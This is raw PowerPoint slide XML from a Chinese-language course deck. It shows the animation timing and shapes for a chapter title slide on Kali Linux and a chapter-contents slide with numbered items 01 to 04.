                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="56" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="11"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_w/10"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="50000">
                                          <p:val>
                                            <p:strVal val="#ppt_w+.01"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="57" dur="500" tmFilter="0,0; .5, 1; 1, 1"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="11"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="58" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="7600"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="59" presetID="26" presetClass="emph" presetSubtype="0" fill="hold" grpId="1" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="lt">
                                    <p:tmPct val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="60" dur="500" tmFilter="0, 0; .2, .5; .8, .5; 1, 0"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="11"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:animScale>
                                      <p:cBhvr>
                                        <p:cTn id="61" dur="250" autoRev="1" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="11"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                      <p:by x="105000" y="105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21" grpId="1"/>
      <p:bldP spid="3" grpId="0"/>
      <p:bldP spid="3" grpId="1"/>
      <p:bldP spid="10" grpId="0"/>
      <p:bldP spid="10" grpId="1"/>
      <p:bldP spid="11" grpId="0"/>
      <p:bldP spid="11" grpId="1"/>
    </p:bldLst>
  </p:timing>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等腰三角形 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="-354902" y="1593655"/>
            <a:ext cx="2812747" cy="2101740"/>
          </a:xfrm>
          <a:prstGeom prst="triangle">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent4">
              <a:alpha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p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3859264" y="2678072"/>
            <a:ext cx="5245100" cy="829945"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>第</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>章</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>Kali Linux</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="等腰三角形 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="10384747" y="2655849"/>
            <a:ext cx="2069408" cy="1546303"/>
          </a:xfrm>
          <a:prstGeom prst="triangle">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2">
              <a:alpha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p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="等腰三角形 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="-436508" y="2327919"/>
            <a:ext cx="3458403" cy="2584187"/>
          </a:xfrm>
          <a:prstGeom prst="triangle">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent5">
              <a:alpha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p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="文本框 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="47928" y="2883669"/>
            <a:ext cx="1612900" cy="1568450"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="9600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>02</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="9600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="9" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2"/>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6"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="12" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="6"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="13" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="6"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="14" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="6"/>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7"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="17" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="7"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="18" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="7"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="19" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="7"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="20" presetID="53" presetClass="entr" presetSubtype="16" fill="hold" grpId="0" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="21" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="8"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="22" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="8"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="23" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="8"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="24" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="8"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="25" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="26" presetID="2" presetClass="entr" presetSubtype="8" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="27" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="3"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="28" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="0-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="29" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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bldLvl="0" animBg="1"/>
      <p:bldP spid="3" grpId="0"/>
      <p:bldP spid="6" grpId="0" bldLvl="0" animBg="1"/>
      <p:bldP spid="7" grpId="0" bldLvl="0" animBg="1"/>
      <p:bldP spid="8" grpId="0"/>
    </p:bldLst>
  </p:timing>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Text Placeholder 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1071996" y="2766621"/>
            <a:ext cx="3008380" cy="662379"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">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buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4265" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>本章内容</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4265" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="45" name="组合 44"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4606151" y="1565050"/>
            <a:ext cx="1192345" cy="666115"/>
            <a:chOff x="2215144" y="927951"/>
            <a:chExt cx="1244730" cy="915925"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="46" name="平行四边形 45"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2215144" y="982844"/>
              <a:ext cx="1120898" cy="842780"/>
            </a:xfrm>
            <a:prstGeom prst="parallelogram">
              <a:avLst>
                <a:gd name="adj" fmla="val 48207"/>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65">
                <a:latin typeface="Impact" panose="020B0806030902050204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="47" name="文本框 9"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2393075" y="927951"/>
              <a:ext cx="1066799" cy="915925"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="3735" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Impact" panose="020B0806030902050204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>01</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3735" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Impact" panose="020B0806030902050204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="48" name="组合 47"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4606151" y="2471202"/>
            <a:ext cx="1192345" cy="672217"/>
            <a:chOff x="2215144" y="1952311"/>
            <a:chExt cx="1244730" cy="924318"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="49" name="平行四边形 48"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2215144" y="2033848"/>
              <a:ext cx="1120898" cy="842781"/>
            </a:xfrm>
            <a:prstGeom prst="parallelogram">
              <a:avLst>
                <a:gd name="adj" fmla="val 48207"/>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65">
                <a:latin typeface="Impact" panose="020B0806030902050204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="50" name="文本框 10"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2393075" y="1952311"/>
              <a:ext cx="1066799" cy="915927"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="3735" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Impact" panose="020B0806030902050204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>02</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3735" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Impact" panose="020B0806030902050204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="51" name="组合 50"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4606151" y="3407000"/>
            <a:ext cx="1192345" cy="666115"/>
            <a:chOff x="2215144" y="3018134"/>
            <a:chExt cx="1244730" cy="915925"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="52" name="平行四边形 51"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2215144" y="3084852"/>
              <a:ext cx="1120898" cy="842781"/>
            </a:xfrm>
            <a:prstGeom prst="parallelogram">
              <a:avLst>
                <a:gd name="adj" fmla="val 48207"/>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65">
                <a:latin typeface="Impact" panose="020B0806030902050204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="53" name="文本框 11"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2393075" y="3018134"/>
              <a:ext cx="1066799" cy="915925"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="3735" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Impact" panose="020B0806030902050204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>03</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3735" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Impact" panose="020B0806030902050204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="54" name="组合 53"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4596626" y="4316986"/>
            <a:ext cx="1192345" cy="677512"/>
            <a:chOff x="2215144" y="4047039"/>
            <a:chExt cx="1244730" cy="931598"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="55" name="平行四边形 54"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2215144" y="4135856"/>
              <a:ext cx="1120898" cy="842781"/>
            </a:xfrm>
            <a:prstGeom prst="parallelogram">
              <a:avLst>
                <a:gd name="adj" fmla="val 48207"/>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65">
                <a:latin typeface="Impact" panose="020B0806030902050204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="56" name="文本框 12"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2393075" y="4047039"/>
              <a:ext cx="1066799" cy="915927"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="3735" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Impact" panose="020B0806030902050204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>04</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3735" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Impact" panose="020B0806030902050204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="60" name="组合 59"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5511822" y="1582798"/>
            <a:ext cx="5143000" cy="612920"/>
            <a:chOff x="4315150" y="953426"/>
            <a:chExt cx="3857250" cy="540057"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="61" name="矩形 60"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4615667" y="1005461"/>
              <a:ext cx="3228975" cy="405646"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="15875">
              <a:noFill/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720">
              <a:spAutoFit/>
            </a:bodyPr>
